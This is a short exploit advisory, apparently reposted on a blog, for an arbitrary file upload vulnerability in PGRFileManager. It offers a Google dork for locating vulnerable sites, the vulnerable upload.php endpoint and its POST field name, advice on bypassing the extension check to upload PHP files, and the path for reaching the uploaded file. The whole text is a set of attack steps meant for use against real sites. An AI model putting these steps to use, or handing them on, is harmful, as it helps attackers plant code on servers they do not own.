PGRFileManager arbitraty file upload
/////////////////////////////////////////////////
# Exploit Title: PGRFileManager arbitraty file upload
# Google Dork:
inurl:/pgrfilemanager/ index of
# Date: -
# Exploit Author: -
# Team: -
# Vendor Homepage: http://pgrfilemanager.sourceforge.net/
# Tested on: Mozilla firefox 40.0 Windows 7 ultimate x64
************************************************
{+} search the dork in google search engine or other
{+} open target
{+} exploit : localhost/path/pgrfilemanager/php/upload.php
{+} vuln ? blank
{+} open CSRF HERE
post file = Filedata
upload file ext php, html , jpg or other ( bypass ext )
{+} Access file : localhost/path/pgrfilemanager/userfiles/namefile.php
***********************************************
thanks to Zi-slow
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Komentar
Posting Komentar